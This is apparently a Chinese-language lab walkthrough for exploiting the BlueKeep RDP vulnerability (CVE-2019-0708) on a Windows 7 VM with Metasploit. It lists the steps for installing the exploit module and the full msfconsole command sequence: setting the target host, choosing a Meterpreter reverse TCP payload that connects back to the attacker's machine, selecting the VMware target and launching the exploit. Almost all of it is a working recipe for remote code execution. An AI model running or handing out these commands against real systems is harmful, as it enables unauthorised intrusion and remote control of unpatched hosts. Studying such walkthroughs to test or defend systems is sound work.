利用CVE2019-0708攻击主机拿shell

靶机:windows 7 x64
攻击:metasploit

添加CVE2019-0708漏洞exp
exp链接:CVE-2019-0708

添加步骤:

1、在 /usr/share/metasploit-framework/modules/exploits/windows/下创建一个文件夹命名为rdp

2、把 cve_2019_0708_bluekeep_rce.rb 复制到刚刚创建的rdp文件夹中

3、把rdp.rb 替换到 /usr/share/metasploit-framework/lib/msf/core/exploit/

4、把rdp_scanner.rb 替换到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp

5、把cve_2019_0708_bluekeep.rb 替换到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp

启动metasploit

msfconsole

重新加载exp:

reload_all

选择exp:

search 0708

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

1.png

show options

设置目标IP

set rhosts 192.168.90.128

设置攻击载荷

show payloads

set payload windows/x64/meterpreter/reverse_tcp

设置本机IP

set lhost 192.168.90.1

根据具体情况设置target

1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)

2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)

3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)

4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

因为是攻击运行在VMware上的Windows 7,所以target设置3

set target 3

所有配置如图

2.png

开始攻击

exploit

3.png